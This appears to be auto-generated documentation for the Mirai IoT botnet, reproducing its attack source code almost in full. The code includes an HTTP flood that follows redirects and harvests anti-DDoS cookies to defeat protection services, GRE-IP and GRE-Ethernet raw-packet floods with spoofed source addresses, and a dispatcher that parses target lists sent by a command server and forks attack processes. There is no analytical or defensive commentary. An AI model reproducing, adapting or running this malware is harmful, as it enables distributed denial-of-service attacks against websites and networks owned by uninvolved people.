                                     }
                                 }
                             }
                         }
                         processed += offset;
                     }
                     // this will still work as previous handlers will only add in null chars or similar
                     // and we specify the size of the string to stristr
                     if (util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_LOCATION_HDR, NULL)) != -1)
                     {
                         int offset = util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_LOCATION_HDR, NULL));
                         if (generic_memes[offset] == ' ')
                             offset++;
                         int nl_off = util_memsearch(generic_memes + offset, ret - offset, "\r\n", 2);
                         if (nl_off != -1)
{
                             char *loc_ptr = &(generic_memes[offset]);
                             if (nl_off >= 2)
                                 nl_off -= 2;
                             generic_memes[offset + nl_off] = 0;
                             //increment it one so that it is length of the string excluding null char instead of 0-based offset
                             nl_off++;
                             if (util_memsearch(loc_ptr, nl_off, "http", 4) == 4)
{
                                 //this is an absolute url, domain name change maybe?
                                 ii = 7;
                                 //http(s)
                                 if (loc_ptr[4] == 's')
                                     ii++;
                                 memmove(loc_ptr, loc_ptr + ii, nl_off - ii);
                                 ii = 0;
                                 while (loc_ptr[ii] != 0)
{
                                     if (loc_ptr[ii] == '/')
{
                                         loc_ptr[ii] = 0;
                                         break;
                                     }
                                     ii++;
                                 }
                                 // domain: loc_ptr;
                                 // path: &(loc_ptr[ii + 1]);
                                 if (util_strlen(loc_ptr) > 0 && util_strlen(loc_ptr) < HTTP_DOMAIN_MAX)
                                     util_strcpy(conn->domain, loc_ptr);
                                 if (util_strlen(&(loc_ptr[ii + 1])) < HTTP_PATH_MAX)
{
                                     util_zero(conn->path + 1, HTTP_PATH_MAX - 1);
                                     if (util_strlen(&(loc_ptr[ii + 1])) > 0)
                                         util_strcpy(conn->path + 1, &(loc_ptr[ii + 1]));
                                 }
                             }
                             else if (loc_ptr[0] == '/')
{
                                 //handle relative url
                                 util_zero(conn->path + 1, HTTP_PATH_MAX - 1);
                                 if (util_strlen(&(loc_ptr[ii + 1])) > 0 && util_strlen(&(loc_ptr[ii + 1])) < HTTP_PATH_MAX)
                                     util_strcpy(conn->path + 1, &(loc_ptr[ii + 1]));
                             }
                             conn->state = HTTP_CONN_RESTART;
                             continue;
                         }
                     }
                     if (util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_REFRESH_HDR, NULL)) != -1)
                     {
                         int offset = util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_REFRESH_HDR, NULL));
                         if (generic_memes[offset] == ' ')
                             offset++;
                         int nl_off = util_memsearch(generic_memes + offset, ret - offset, "\r\n", 2);
                         if (nl_off != -1)
{
                             char *loc_ptr = &(generic_memes[offset]);
                             if (nl_off >= 2)
                                 nl_off -= 2;
                             generic_memes[offset + nl_off] = 0;
                             //increment it one so that it is length of the string excluding null char instead of 0-based offset
                             nl_off++;
                             ii = 0;
                             while (loc_ptr[ii] != 0 && loc_ptr[ii] >= '0' && loc_ptr[ii] <= '9')
                                 ii++;
                             if (loc_ptr[ii] != 0)
{
                                 int wait_time = 0;
                                 loc_ptr[ii] = 0;
                                 ii++;
                                 if (loc_ptr[ii] == ' ')
                                     ii++;
                                 if (util_stristr(&(loc_ptr[ii]), util_strlen(&(loc_ptr[ii])), "url=") != -1)
                                     ii += util_stristr(&(loc_ptr[ii]), util_strlen(&(loc_ptr[ii])), "url=");
                                 if (loc_ptr[ii] == '"')
{
                                     ii++;
                                     //yes its ugly, but i dont care
                                     if ((&(loc_ptr[ii]))[util_strlen(&(loc_ptr[ii])) - 1] == '"')
                                         (&(loc_ptr[ii]))[util_strlen(&(loc_ptr[ii])) - 1] = 0;
                                 }
                                 wait_time = util_atoi(loc_ptr, 10);
                                 //YOLO LOL
                                 while (wait_time > 0 && wait_time < 10 && fake_time + wait_time > time(NULL))
                                     sleep(1);
                                 loc_ptr = &(loc_ptr[ii]);
                                 if (util_stristr(loc_ptr, util_strlen(loc_ptr), "http") == 4)
{
                                     //this is an absolute url, domain name change maybe?
                                     ii = 7;
                                     //http(s)
                                     if (loc_ptr[4] == 's')
                                         ii++;
                                     memmove(loc_ptr, loc_ptr + ii, nl_off - ii);
                                     ii = 0;
                                     while (loc_ptr[ii] != 0)
{
                                         if (loc_ptr[ii] == '/')
{
                                             loc_ptr[ii] = 0;
                                             break;
                                         }
                                         ii++;
                                     }
                                     // domain: loc_ptr;
                                     // path: &(loc_ptr[ii + 1]);
                                     if (util_strlen(loc_ptr) > 0 && util_strlen(loc_ptr) < HTTP_DOMAIN_MAX)
                                         util_strcpy(conn->domain, loc_ptr);
                                     if (util_strlen(&(loc_ptr[ii + 1])) < HTTP_PATH_MAX)
{
                                         util_zero(conn->path + 1, HTTP_PATH_MAX - 1);
                                         if (util_strlen(&(loc_ptr[ii + 1])) > 0)
                                             util_strcpy(conn->path + 1, &(loc_ptr[ii + 1]));
                                     }
                                 }
                                 else if (loc_ptr[0] == '/')
{
                                     //handle relative url
                                     if (util_strlen(&(loc_ptr[ii + 1])) < HTTP_PATH_MAX)
{
                                         util_zero(conn->path + 1, HTTP_PATH_MAX - 1);
                                         if (util_strlen(&(loc_ptr[ii + 1])) > 0)
                                             util_strcpy(conn->path + 1, &(loc_ptr[ii + 1]));
                                     }
                                 }
                                 strcpy(conn->method, "GET");
                                 // queue the state up for the next time
                                 conn->state = HTTP_CONN_QUEUE_RESTART;
                                 continue;
                             }
                         }
                     }
                     // actually pull the content from the buffer that we processed via MSG_PEEK
                     processed = util_memsearch(generic_memes, ret, "\r\n\r\n", 4);
                     if (util_strcmp(conn->method, "POST") || util_strcmp(conn->method, "GET"))
                         conn->state = HTTP_CONN_RECV_BODY;
                     else if (ret > processed)
                         conn->state = HTTP_CONN_QUEUE_RESTART;
                     else
                         conn->state = HTTP_CONN_RESTART;
                     ret = recv(conn->fd, generic_memes, processed, MSG_NOSIGNAL);
                 } else if (conn->state == HTTP_CONN_RECV_BODY) {
                     while (TRUE)
                     {
                         // spooky doods changed state
                         if (conn->state != HTTP_CONN_RECV_BODY)
{
                             break;
                         }
                         if (conn->rdbuf_pos == HTTP_RDBUF_SIZE)
{
                             memmove(conn->rdbuf, conn->rdbuf + HTTP_HACK_DRAIN, HTTP_RDBUF_SIZE - HTTP_HACK_DRAIN);
                             conn->rdbuf_pos -= HTTP_HACK_DRAIN;
                         }
                         errno = 0;
                         ret = recv(conn->fd, conn->rdbuf + conn->rdbuf_pos, HTTP_RDBUF_SIZE - conn->rdbuf_pos, MSG_NOSIGNAL);
                         if (ret == 0)
{
 #ifdef DEBUG
                             printf("[http flood] FD%d connection gracefully closed\n", conn->fd);
 #endif
                             errno = ECONNRESET;
                             ret = -1; // Fall through to closing connection below
                         }
                         if (ret == -1)
{
                             if (errno != EAGAIN && errno != EWOULDBLOCK)
{
 #ifdef DEBUG
                                 printf("[http flood] FD%d lost connection\n", conn->fd);
 #endif
                                 close(conn->fd);
                                 conn->fd = -1;
                                 conn->state = HTTP_CONN_INIT;
                             }
                             break;
                         }
                         conn->rdbuf_pos += ret;
                         conn->last_recv = fake_time;
                         while (TRUE)
{
                             int consumed = 0;
                             if (conn->content_length > 0)
{
                                 consumed = conn->content_length > conn->rdbuf_pos ? conn->rdbuf_pos : conn->content_length;
                                 conn->content_length -= consumed;
                                 if (conn->protection_type == HTTP_PROT_DOSARREST)
{
                                     // we specifically want this to be case sensitive
                                     if (util_memsearch(conn->rdbuf, conn->rdbuf_pos, table_retrieve_val(TABLE_ATK_SET_COOKIE, NULL), 11) != -1)
{
                                         int start_pos = util_memsearch(conn->rdbuf, conn->rdbuf_pos, table_retrieve_val(TABLE_ATK_SET_COOKIE, NULL), 11);
                                         int end_pos = util_memsearch(&(conn->rdbuf[start_pos]), conn->rdbuf_pos - start_pos, "'", 1);
                                         conn->rdbuf[start_pos + (end_pos - 1)] = 0;
                                         if (conn->num_cookies < HTTP_COOKIE_MAX && util_strlen(&(conn->rdbuf[start_pos])) < HTTP_COOKIE_LEN_MAX)
{
                                             util_strcpy(conn->cookies[conn->num_cookies], &(conn->rdbuf[start_pos]));
                                             util_strcpy(conn->cookies[conn->num_cookies] + util_strlen(conn->cookies[conn->num_cookies]), "=");
                                             start_pos += end_pos + 3;
                                             end_pos = util_memsearch(&(conn->rdbuf[start_pos]), conn->rdbuf_pos - start_pos, "'", 1);
                                             conn->rdbuf[start_pos + (end_pos - 1)] = 0;
                                             util_strcpy(conn->cookies[conn->num_cookies] + util_strlen(conn->cookies[conn->num_cookies]), &(conn->rdbuf[start_pos]));
                                             conn->num_cookies++;
                                         }
                                         conn->content_length = -1;
                                         conn->state = HTTP_CONN_QUEUE_RESTART;
                                         break;
                                     }
                                 }
                             }
                             if (conn->content_length == 0)
{
                                 if (conn->chunked == 1)
{
                                     if (util_memsearch(conn->rdbuf, conn->rdbuf_pos, "\r\n", 2) != -1)
{
                                         int new_line_pos = util_memsearch(conn->rdbuf, conn->rdbuf_pos, "\r\n", 2);
                                         conn->rdbuf[new_line_pos - 2] = 0;
                                         if (util_memsearch(conn->rdbuf, new_line_pos, ";", 1) != -1)
                                             conn->rdbuf[util_memsearch(conn->rdbuf, new_line_pos, ";", 1)] = 0;
                                         int chunklen = util_atoi(conn->rdbuf, 16);
                                         if (chunklen == 0)
{
                                             conn->state = HTTP_CONN_RESTART;
                                             break;
                                         }
                                         conn->content_length = chunklen + 2;
                                         consumed = new_line_pos;
                                     }
                                 } else {
                                     // get rid of any extra in the buf before we move on...
                                     conn->content_length = conn->rdbuf_pos - consumed;
                                     if (conn->content_length == 0)
{
                                         conn->state = HTTP_CONN_RESTART;
                                         break;
                                     }
                                 }
                             }
                             if (consumed == 0)
                                 break;
                             else
{
                                 conn->rdbuf_pos -= consumed;
                                 memmove(conn->rdbuf, conn->rdbuf + consumed, conn->rdbuf_pos);
                                 conn->rdbuf[conn->rdbuf_pos] = 0;
                                 if (conn->rdbuf_pos == 0)
                                     break;
                             }
                         }
                     }
                 } else if (conn->state == HTTP_CONN_QUEUE_RESTART) {
                     while(TRUE)
                     {
                         errno = 0;
                         ret = recv(conn->fd, generic_memes, 10240, MSG_NOSIGNAL);
                         if (ret == 0)
{
 #ifdef DEBUG
                             printf("[http flood] HTTP_CONN_QUEUE_RESTART FD%d connection gracefully closed\n", conn->fd);
 #endif
                             errno = ECONNRESET;
                             ret = -1; // Fall through to closing connection below
                         }
                         if (ret == -1)
{
                             if (errno != EAGAIN && errno != EWOULDBLOCK)
{
 #ifdef DEBUG
                                 printf("[http flood] HTTP_CONN_QUEUE_RESTART FD%d lost connection\n", conn->fd);
 #endif
                                 close(conn->fd);
                                 conn->fd = -1;
                                 conn->state = HTTP_CONN_INIT;
                             }
                             break;
                         }
                     }
                     if (conn->state != HTTP_CONN_INIT)
                         conn->state = HTTP_CONN_RESTART;
                 }
             }
         }
         // handle any sockets that didnt return from select here
         // also handle timeout on HTTP_CONN_QUEUE_RESTART just in case there was no other data to be read (^: (usually this will never happen)
 #ifdef DEBUG
         if (sockets == 1)
         {
             printf("debug mode sleep\n");
             sleep(1);
         }
 #endif
     }
 }
void attack_app_proxy (uint8_t , struct attack_target * , uint8_t , struct attack_option *)
Definition at line 20 of file attack_app.c.
 {
 }
int attack_get_opt_int (uint8_t , struct attack_option * , uint8_t , int)
Definition at line 206 of file attack.c.
References attack_get_opt_str(), util_atoi(), and attack_option::val.
Referenced by attack_app_cfnull(), attack_app_http(), attack_gre_eth(), attack_gre_ip(), attack_tcp_ack(), attack_tcp_stomp(), attack_tcp_syn(), attack_udp_dns(), attack_udp_generic(), attack_udp_plain(), and attack_udp_vse().
 {
     char *val = attack_get_opt_str(opts_len, opts, opt, NULL);
     if (val == NULL)
         return def;
     else
         return util_atoi(val, 10);
 }
uint32_t attack_get_opt_ip (uint8_t , struct attack_option * , uint8_t , uint32_t)
Definition at line 216 of file attack.c.
References attack_get_opt_str(), and attack_option::val.
Referenced by attack_tcp_ack(), and attack_tcp_syn().
 {
     char *val = attack_get_opt_str(opts_len, opts, opt, NULL);
     if (val == NULL)
         return def;
     else
         return inet_addr(val);
 }
char* attack_get_opt_str (uint8_t , struct attack_option * , uint8_t , char *)
Definition at line 193 of file attack.c.
References attack_option::key, and attack_option::val.
Referenced by attack_app_cfnull(), attack_app_http(), attack_get_opt_int(), attack_get_opt_ip(), and attack_udp_dns().
 {
     int i;
     for (i = 0; i < opts_len; i++)
     {
         if (opts[i].key == opt)
             return opts[i].val;
     }
     return def;
 }
void attack_gre_eth (uint8_t , struct attack_target * , uint8_t , struct attack_option *)
Definition at line 162 of file attack_gre.c.
References attack_target::addr, ATK_OPT_DPORT, ATK_OPT_GRE_CONSTIP, ATK_OPT_IP_DF, ATK_OPT_IP_IDENT, ATK_OPT_IP_TOS, ATK_OPT_IP_TTL, ATK_OPT_PAYLOAD_RAND, ATK_OPT_PAYLOAD_SIZE, ATK_OPT_SOURCE, ATK_OPT_SPORT, attack_get_opt_int(), checksum_generic(), checksum_tcpudp(), close, data_len, FALSE, LOCAL_ADDR, PROTO_GRE_TRANS_ETH, grehdr::protocol, rand_next(), rand_str(), attack_target::sock_addr, socket, TRUE, and util_memcpy().
Referenced by attack_init().
 {
     int i, fd;
     char **pkts = calloc(targs_len, sizeof (char *));
     uint8_t ip_tos = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TOS, 0);
     uint16_t ip_ident = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_IDENT, 0xffff);
     uint8_t ip_ttl = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TTL, 64);
     BOOL dont_frag = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_DF, TRUE);
     port_t sport = attack_get_opt_int(opts_len, opts, ATK_OPT_SPORT, 0xffff);
     port_t dport = attack_get_opt_int(opts_len, opts, ATK_OPT_DPORT, 0xffff);
     int data_len = attack_get_opt_int(opts_len, opts, ATK_OPT_PAYLOAD_SIZE, 512);
     BOOL data_rand = attack_get_opt_int(opts_len, opts, ATK_OPT_PAYLOAD_RAND, TRUE);
     BOOL gcip = attack_get_opt_int(opts_len, opts, ATK_OPT_GRE_CONSTIP, FALSE);
     uint32_t source_ip = attack_get_opt_int(opts_len, opts, ATK_OPT_SOURCE, LOCAL_ADDR);
     if ((fd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
     {
 #ifdef DEBUG
         printf("Failed to create raw socket. Aborting attack\n");
 #endif
         return;
     }
     i = 1;
     if (setsockopt(fd, IPPROTO_IP, IP_HDRINCL, &i, sizeof (int)) == -1)
     {
 #ifdef DEBUG
         printf("Failed to set IP_HDRINCL. Aborting\n");
 #endif
         close(fd);
         return;
     }
     for (i = 0; i < targs_len; i++)
     {
         struct iphdr *iph;
         struct grehdr *greh;
         struct ethhdr *ethh;
         struct iphdr *greiph;
         struct udphdr *udph;
         uint32_t ent1, ent2, ent3;
         pkts[i] = calloc(1510, sizeof (char *));
         iph = (struct iphdr *)(pkts[i]);
         greh = (struct grehdr *)(iph + 1);
         ethh = (struct ethhdr *)(greh + 1);
         greiph = (struct iphdr *)(ethh + 1);
         udph = (struct udphdr *)(greiph + 1);
         // IP header init
         iph->version = 4;
         iph->ihl = 5;
         iph->tos = ip_tos;
         iph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct grehdr) + sizeof (struct ethhdr) + sizeof (struct iphdr) + sizeof (struct udphdr) + data_len);
         iph->id = htons(ip_ident);
         iph->ttl = ip_ttl;
         if (dont_frag)
             iph->frag_off = htons(1 << 14);
         iph->protocol = IPPROTO_GRE;
         iph->saddr = source_ip;
         iph->daddr = targs[i].addr;
         // GRE header init
         greh->protocol = htons(PROTO_GRE_TRANS_ETH); // Protocol is 2 bytes
         // Ethernet header init
         ethh->h_proto = htons(ETH_P_IP);
         // Encapsulated IP header init
         greiph->version = 4;
         greiph->ihl = 5;
         greiph->tos = ip_tos;
         greiph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct udphdr) + data_len);
         greiph->id = htons(~ip_ident);
         greiph->ttl = ip_ttl;
         if (dont_frag)
             greiph->frag_off = htons(1 << 14);
         greiph->protocol = IPPROTO_UDP;
         greiph->saddr = rand_next();
         if (gcip)
             greiph->daddr = iph->daddr;
         else
             greiph->daddr = ~(greiph->saddr - 1024);
         // UDP header init
         udph->source = htons(sport);
         udph->dest = htons(dport);
         udph->len = htons(sizeof (struct udphdr) + data_len);
     }
     while (TRUE)
     {
         for (i = 0; i < targs_len; i++)
         {
             char *pkt = pkts[i];
             struct iphdr *iph = (struct iphdr *)pkt;
             struct grehdr *greh = (struct grehdr *)(iph + 1);
             struct ethhdr *ethh = (struct ethhdr *)(greh + 1);
             struct iphdr *greiph = (struct iphdr *)(ethh + 1);
             struct udphdr *udph = (struct udphdr *)(greiph + 1);
             char *data = (char *)(udph + 1);
             uint32_t ent1, ent2, ent3;
             // For prefix attacks
             if (targs[i].netmask < 32)
                 iph->daddr = htonl(ntohl(targs[i].addr) + (((uint32_t)rand_next()) >> targs[i].netmask));
             if (source_ip == 0xffffffff)
                 iph->saddr = rand_next();
             if (ip_ident == 0xffff)
             {
                 iph->id = rand_next() & 0xffff;
                 greiph->id = ~(iph->id - 1000);
             }
             if (sport == 0xffff)
                 udph->source = rand_next() & 0xffff;
             if (dport == 0xffff)
                 udph->dest = rand_next() & 0xffff;
             if (!gcip)
                 greiph->daddr = rand_next();
             else
                 greiph->daddr = iph->daddr;
             ent1 = rand_next();
             ent2 = rand_next();
             ent3 = rand_next();
             util_memcpy(ethh->h_dest, (char *)&ent1, 4);
             util_memcpy(ethh->h_source, (char *)&ent2, 4);
             util_memcpy(ethh->h_dest + 4, (char *)&ent3, 2);
             util_memcpy(ethh->h_source + 4, (((char *)&ent3)) + 2, 2);
             if (data_rand)
                 rand_str(data, data_len);
             iph->check = 0;
             iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));
             greiph->check = 0;
             greiph->check = checksum_generic((uint16_t *)greiph, sizeof (struct iphdr));
             udph->check = 0;
             udph->check = checksum_tcpudp(greiph, udph, udph->len, sizeof (struct udphdr) + data_len);
             targs[i].sock_addr.sin_family = AF_INET;
             targs[i].sock_addr.sin_addr.s_addr = iph->daddr;
             targs[i].sock_addr.sin_port = 0;
             sendto(fd, pkt, sizeof (struct iphdr) + sizeof (struct grehdr) + sizeof (struct ethhdr) + sizeof (struct iphdr) + sizeof (struct udphdr) + data_len, MSG_NOSIGNAL, (struct sockaddr *)&targs[i].sock_addr, sizeof (struct sockaddr_in));
         }
 #ifdef DEBUG
         if (errno != 0)
             printf("errno = %d\n", errno);
         break;
 #endif
     }
 }
void attack_gre_ip (uint8_t , struct attack_target * , uint8_t , struct attack_option *)
Definition at line 20 of file attack_gre.c.
References attack_target::addr, ATK_OPT_DPORT, ATK_OPT_GRE_CONSTIP, ATK_OPT_IP_DF, ATK_OPT_IP_IDENT, ATK_OPT_IP_TOS, ATK_OPT_IP_TTL, ATK_OPT_PAYLOAD_RAND, ATK_OPT_PAYLOAD_SIZE, ATK_OPT_SOURCE, ATK_OPT_SPORT, attack_get_opt_int(), checksum_generic(), checksum_tcpudp(), close, data_len, FALSE, LOCAL_ADDR, grehdr::protocol, rand_next(), rand_str(), attack_target::sock_addr, socket, and TRUE.
Referenced by attack_init().
 {
     int i, fd;
     char **pkts = calloc(targs_len, sizeof (char *));
     uint8_t ip_tos = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TOS, 0);
     uint16_t ip_ident = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_IDENT, 0xffff);
     uint8_t ip_ttl = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TTL, 64);
     BOOL dont_frag = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_DF, TRUE);
     port_t sport = attack_get_opt_int(opts_len, opts, ATK_OPT_SPORT, 0xffff);
     port_t dport = attack_get_opt_int(opts_len, opts, ATK_OPT_DPORT, 0xffff);
     int data_len = attack_get_opt_int(opts_len, opts, ATK_OPT_PAYLOAD_SIZE, 512);
     BOOL data_rand = attack_get_opt_int(opts_len, opts, ATK_OPT_PAYLOAD_RAND, TRUE);
     BOOL gcip = attack_get_opt_int(opts_len, opts, ATK_OPT_GRE_CONSTIP, FALSE);
     uint32_t source_ip = attack_get_opt_int(opts_len, opts, ATK_OPT_SOURCE, LOCAL_ADDR);
     if ((fd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
     {
 #ifdef DEBUG
         printf("Failed to create raw socket. Aborting attack\n");
 #endif
         return;
     }
     i = 1;
     if (setsockopt(fd, IPPROTO_IP, IP_HDRINCL, &i, sizeof (int)) == -1)
     {
 #ifdef DEBUG
         printf("Failed to set IP_HDRINCL. Aborting\n");
 #endif
         close(fd);
         return;
     }
     for (i = 0; i < targs_len; i++)
     {
         struct iphdr *iph;
         struct grehdr *greh;
         struct iphdr *greiph;
         struct udphdr *udph;
         pkts[i] = calloc(1510, sizeof (char *));
         iph = (struct iphdr *)(pkts[i]);
         greh = (struct grehdr *)(iph + 1);
         greiph = (struct iphdr *)(greh + 1);
         udph = (struct udphdr *)(greiph + 1);
         // IP header init
         iph->version = 4;
         iph->ihl = 5;
         iph->tos = ip_tos;
         iph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct grehdr) + sizeof (struct iphdr) + sizeof (struct udphdr) + data_len);
         iph->id = htons(ip_ident);
         iph->ttl = ip_ttl;
         if (dont_frag)
             iph->frag_off = htons(1 << 14);
         iph->protocol = IPPROTO_GRE;
         iph->saddr = source_ip;
         iph->daddr = targs[i].addr;
         // GRE header init
         greh->protocol = htons(ETH_P_IP); // Protocol is 2 bytes
         // Encapsulated IP header init
         greiph->version = 4;
         greiph->ihl = 5;
         greiph->tos = ip_tos;
         greiph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct udphdr) + data_len);
         greiph->id = htons(~ip_ident);
         greiph->ttl = ip_ttl;
         if (dont_frag)
             greiph->frag_off = htons(1 << 14);
         greiph->protocol = IPPROTO_UDP;
         greiph->saddr = rand_next();
         if (gcip)
             greiph->daddr = iph->daddr;
         else
             greiph->daddr = ~(greiph->saddr - 1024);
         // UDP header init
         udph->source = htons(sport);
         udph->dest = htons(dport);
         udph->len = htons(sizeof (struct udphdr) + data_len);
     }
     while (TRUE)
     {
         for (i = 0; i < targs_len; i++)
         {
             char *pkt = pkts[i];
             struct iphdr *iph = (struct iphdr *)pkt;
             struct grehdr *greh = (struct grehdr *)(iph + 1);
             struct iphdr *greiph = (struct iphdr *)(greh + 1);
             struct udphdr *udph = (struct udphdr *)(greiph + 1);
             char *data = (char *)(udph + 1);
             // For prefix attacks
             if (targs[i].netmask < 32)
                 iph->daddr = htonl(ntohl(targs[i].addr) + (((uint32_t)rand_next()) >> targs[i].netmask));
             if (source_ip == 0xffffffff)
                 iph->saddr = rand_next();
             if (ip_ident == 0xffff)
             {
                 iph->id = rand_next() & 0xffff;
                 greiph->id = ~(iph->id - 1000);
             }
             if (sport == 0xffff)
                 udph->source = rand_next() & 0xffff;
             if (dport == 0xffff)
                 udph->dest = rand_next() & 0xffff;
             if (!gcip)
                 greiph->daddr = rand_next();
             else
                 greiph->daddr = iph->daddr;
             if (data_rand)
                 rand_str(data, data_len);
             iph->check = 0;
             iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));
             greiph->check = 0;
             greiph->check = checksum_generic((uint16_t *)greiph, sizeof (struct iphdr));
             udph->check = 0;
             udph->check = checksum_tcpudp(greiph, udph, udph->len, sizeof (struct udphdr) + data_len);
             targs[i].sock_addr.sin_family = AF_INET;
             targs[i].sock_addr.sin_addr.s_addr = iph->daddr;
             targs[i].sock_addr.sin_port = 0;
             sendto(fd, pkt, sizeof (struct iphdr) + sizeof (struct grehdr) + sizeof (struct iphdr) + sizeof (struct udphdr) + data_len, MSG_NOSIGNAL, (struct sockaddr *)&targs[i].sock_addr, sizeof (struct sockaddr_in));
         }
 #ifdef DEBUG
         if (errno != 0)
             printf("errno = %d\n", errno);
         break;
 #endif
     }
 }
BOOL attack_init (void)
Definition at line 22 of file attack.c.
References add_attack(), ATK_VEC_ACK, ATK_VEC_DNS, ATK_VEC_GREETH, ATK_VEC_GREIP, ATK_VEC_HTTP, ATK_VEC_STOMP, ATK_VEC_SYN, ATK_VEC_UDP, ATK_VEC_UDP_PLAIN, ATK_VEC_VSE, attack_app_http(), attack_gre_eth(), attack_gre_ip(), attack_tcp_ack(), attack_tcp_stomp(), attack_tcp_syn(), attack_udp_dns(), attack_udp_generic(), attack_udp_plain(), attack_udp_vse(), and TRUE.
Referenced by main().
 {
     int i;
     add_attack(ATK_VEC_UDP, (ATTACK_FUNC)attack_udp_generic);
     add_attack(ATK_VEC_VSE, (ATTACK_FUNC)attack_udp_vse);
     add_attack(ATK_VEC_DNS, (ATTACK_FUNC)attack_udp_dns);
     add_attack(ATK_VEC_UDP_PLAIN, (ATTACK_FUNC)attack_udp_plain);
     add_attack(ATK_VEC_SYN, (ATTACK_FUNC)attack_tcp_syn);
     add_attack(ATK_VEC_ACK, (ATTACK_FUNC)attack_tcp_ack);
     add_attack(ATK_VEC_STOMP, (ATTACK_FUNC)attack_tcp_stomp);
     add_attack(ATK_VEC_GREIP, (ATTACK_FUNC)attack_gre_ip);
     add_attack(ATK_VEC_GREETH, (ATTACK_FUNC)attack_gre_eth);
     //add_attack(ATK_VEC_PROXY, (ATTACK_FUNC)attack_app_proxy);
     add_attack(ATK_VEC_HTTP, (ATTACK_FUNC)attack_app_http);
     return TRUE;
 }
void attack_kill_all (void)
Definition at line 44 of file attack.c.
References ATTACK_CONCURRENT_MAX, attack_ongoing, and scanner_init().
Referenced by main().
 {
     int i;
 #ifdef DEBUG
     printf("[attack] Killing all ongoing attacks\n");
 #endif
     for (i = 0; i < ATTACK_CONCURRENT_MAX; i++)
     {
         if (attack_ongoing[i] != 0)
             kill(attack_ongoing[i], 9);
         attack_ongoing[i] = 0;
     }
 #ifdef MIRAI_TELNET
     scanner_init();
 #endif
 }
void attack_parse (char * , int)
Definition at line 64 of file attack.c.
References attack_target::addr, attack_start(), free, free_opts(), attack_option::key, attack_target::netmask, attack_target::sock_addr, util_memcpy(), attack_option::val, and attack_method::vector.
Referenced by main().
 {
     int i;
     uint32_t duration;
     ATTACK_VECTOR vector;
     uint8_t targs_len, opts_len;
     struct attack_target *targs = NULL;
     struct attack_option *opts = NULL;
     // Read in attack duration uint32_t
     if (len < sizeof (uint32_t))
         goto cleanup;
     duration = ntohl(*((uint32_t *)buf));
     buf += sizeof (uint32_t);
     len -= sizeof (uint32_t);
     // Read in attack ID uint8_t
     if (len == 0)
         goto cleanup;
     vector = (ATTACK_VECTOR)*buf++;
     len -= sizeof (uint8_t);
     // Read in target count uint8_t
     if (len == 0)
         goto cleanup;
     targs_len = (uint8_t)*buf++;
     len -= sizeof (uint8_t);
     if (targs_len == 0)
         goto cleanup;
     // Read in all targs
     if (len < ((sizeof (ipv4_t) + sizeof (uint8_t)) * targs_len))
         goto cleanup;
     targs = calloc(targs_len, sizeof (struct attack_target));
     for (i = 0; i < targs_len; i++)
     {
         targs[i].addr = *((ipv4_t *)buf);
         buf += sizeof (ipv4_t);
         targs[i].netmask = (uint8_t)*buf++;
         len -= (sizeof (ipv4_t) + sizeof (uint8_t));
         targs[i].sock_addr.sin_family = AF_INET;
         targs[i].sock_addr.sin_addr.s_addr = targs[i].addr;
     }
     // Read in flag count uint8_t
     if (len < sizeof (uint8_t))
         goto cleanup;
     opts_len = (uint8_t)*buf++;
     len -= sizeof (uint8_t);
     // Read in all opts
     if (opts_len > 0)
     {
         opts = calloc(opts_len, sizeof (struct attack_option));
         for (i = 0; i < opts_len; i++)
         {
             uint8_t val_len;
             // Read in key uint8
             if (len < sizeof (uint8_t))
                 goto cleanup;
             opts[i].key = (uint8_t)*buf++;
             len -= sizeof (uint8_t);
             // Read in data length uint8
             if (len < sizeof (uint8_t))
                 goto cleanup;
             val_len = (uint8_t)*buf++;
             len -= sizeof (uint8_t);
             if (len < val_len)
                 goto cleanup;
             opts[i].val = calloc(val_len + 1, sizeof (char));
             util_memcpy(opts[i].val, buf, val_len);
             buf += val_len;
             len -= val_len;
         }
     }
     errno = 0;
     attack_start(duration, vector, targs_len, targs, opts_len, opts);
     // Cleanup
     cleanup:
     if (targs != NULL)
         free(targs);
     if (opts != NULL)
         free_opts(opts, opts_len);
 }
void attack_start (int , ATTACK_VECTOR , uint8_t , struct attack_target * , uint8_t , struct attack_option *)
Definition at line 155 of file attack.c.
References attack_method::func, and methods_len.
Referenced by attack_parse().
 {
     int pid1, pid2;
     pid1 = fork();
     if (pid1 == -1 || pid1 > 0)
         return;
     pid2 = fork();
     if (pid2 == -1)
         exit(0);
     else if (pid2 == 0)
     {
         sleep(duration);
         kill(getppid(), 9);
         exit(0);
     }
     else
     {
         int i;
         for (i = 0; i < methods_len; i++)
         {
             if (methods[i]->vector == vector)
             {
 #ifdef DEBUG
                 printf("[attack] Starting attack...\n");
 #endif
                 methods[i]->func(targs_len, targs, opts_len, opts);
                 break;
             }
         }
         //just bail if the function returns
         exit(0);
     }
 }
void attack_tcp_ack (uint8_t , struct attack_target * , uint8_t , struct attack_option *)
Definition at line 161 of file attack_tcp.c.
